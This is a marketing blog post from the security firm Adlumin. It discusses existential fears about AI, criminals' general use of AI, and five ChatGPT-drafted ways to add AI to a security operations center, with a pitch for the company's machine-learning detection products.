Existential fears of AI stem more from future stages, like The Theory of Mind in which AI learns empathy and understands the entities it interacts with. Beyond empathy, self-aware AI possesses its own emotions, needs, and desires. This kind of general AI and even super intelligence could lead to self-preservation instincts and pose a threat to humanity.

When we can expect to see the emergence of self-aware superintelligence is anyone’s guess. Right now, it’s a bit more like watching the first hominid use a stick as a tool versus predicting the exact date of the first atomic detonation. I did ask Chat GPT, and this was the response:

For now, it’s “carpe diem” or seizing the day when it comes to AI.

AI in Cybersecurity

Recently, Deborah Snyder a senior fellow with the Center for Digital Government, invited me to a webinar to discuss artificial intelligence trends in cybersecurity. We couldn’t ignore the parallels between the two historical warnings. But our focus was more on today than tomorrow.

In terms of cybersecurity, criminals leverage AI to sabotage defenses, accelerate the development of their tactics and tools like phishing lures, and even lie dormant in the hands of an advanced persistent threat (APT) that’s playing a long game deploying an AI mole in the halls of government or in the defense industry.

But it’s not all dystopian on the cybersecurity front. AI automation solves big data problems and provides a scalable, cost-effective solution for security operations. According to my co-contributor, ChatGPT:

Given that most organizations face increasing cyber threats and compliance demands with diminishing budgets and exhausted resources, AI offers a complementary solution to human-based security operations.

Adlumin’s AI Advancements

From the start, Adlumin invested heavily in the use of artificial intelligence and machine learning (ML), as well as augmented user and entity behavior analytics (UEBA).

The precursors to business-disrupting incidents are buried in an avalanche of false-positive alerts and are camouflaged within legitimate activity logs and events. Adlumin’s machine learning algorithms streamline security operations, ingesting billions of data points to identify critical anomalous behaviors and present your security team with the timely information necessary to respond quickly. Adlumin leverages the latest graph-theory metrics and cluster analysis, including principal components analysis, K-Nearest-Neighbors (KNN), and cluster-based local outlier factor (CBLOF).

Machine learning also drives our risk management services including continuous vulnerability management (CVM), progressive penetration testing (attack simulation), a proactive security awareness program, and multi-layered total ransomware defense.

Determining How to Use AI in Your Organization

Here are the top five simple ways to include AI into your security operations center (SOC) and the benefits they bring:

  1. AI-powered Threat Intelligence: Integrate AI-driven threat intelligence tools into your SOC to enhance threat detection and response capabilities. These tools can analyze vast amounts of data from various sources and automatically identify patterns, indicators of compromise, and emerging threats. By leveraging AI-powered threat intelligence, you can stay ahead of cybercriminals, detect advanced threats faster, and proactively protect your organization’s assets.
  2. Automated Log Analysis: Utilize AI-based log analysis solutions to automate the detection of security events and anomalies in your network logs. AI algorithms can sift through mountains of log data, identifying suspicious activities and potential security incidents. By automating log analysis, you free up your SOC team’s time and improve their efficiency, allowing them to focus on critical tasks and respond swiftly to genuine threats.
  3. Security Orchestration and Automation: Implement AI-driven security orchestration and automation platforms to streamline and optimize incident response workflows. These platforms can integrate with various security tools, allowing for automated incident triage, response, and remediation. By automating routine tasks, you reduce manual errors, accelerate incident response times, and enable your team to handle a higher volume of incidents effectively.
  4. Behavior-based Anomaly Detection: Deploy AI-powered behavior-based anomaly detection systems to detect unusual activities and potential insider threats. These systems can analyze user behavior, network traffic, and endpoint activities to establish baselines of normal behavior. When deviations occur, the AI algorithms can raise alerts, helping you detect suspicious behavior and mitigate the risks associated with insider threats promptly.
  5. Machine Learning-based User Authentication: Utilize AI and machine learning algorithms for user authentication and access control. By implementing intelligent authentication systems, you can detect and prevent unauthorized access attempts based on user behavior patterns. This approach strengthens your security posture, reduces the risk of account compromise, and enhances user experience by minimizing friction during the authentication process.

By including AI in your SOC through these simple methods, you can enjoy several benefits. These include improved threat detection accuracy, faster incident response, reduced manual effort, enhanced anomaly detection capabilities, and increased overall efficiency. AI empowers your SOC team with advanced tools and automation, enabling them to focus on high-value tasks and better protect your organization against ever-evolving cyber threats.

[Clears throat nervously] I couldn’t have said it better myself, ChatGPT.

What’s Next for AI?

Science fiction provides a neutral forum in which we can explore the dark potential of technology. In one such TV show, Caprica, we see the pivotal moment of discovery in this sci-fi world.

Caprica is set nearly 60 years before the AI apocalypse of the re-imagined 2004 series, Battlestar Galactica, and covers the period in which artificial intelligence becomes self-aware. It’s the ground zero breakthrough that would ultimately lead to the destruction of mankind in this science fiction world.

This kind of self-inflicted extinction is predicted in what is called the Great Filter theory. The notion is lifeforms face moments of extinction through pandemics, natural disasters, or runaway technology. The real trick when it comes to AI’s existential threat is knowing which side of this particular filter we are on. Did we safely pass through this filter or is it still looming in our future as a harbinger of doom?

We have lived with nuclear annihilation for decades and haven’t yet fulfilled that apocalyptic prediction. Perhaps we can do the same with artificial intelligence. Regardless, AI today offers promise and direct operational benefits in terms of cybersecurity operations. At Adlumin, we intend to continue our AI investments to protect our customers from ever-evolving cyber threats.

Adlumin SaaS Security

1140 3rd St. NE, Suite 340
Washington, DC 20002
(202) 570-7907

Get a Demo Free Trial Contact Adlumin
Adlumin Inc 5000

Privacy Policy  Sitemap  GDPR Privacy Notice

GDPR Data Processing Addendum  GDPR Privacy Request Form

Copyright 2024 Adlumin, Inc. All Rights Reserved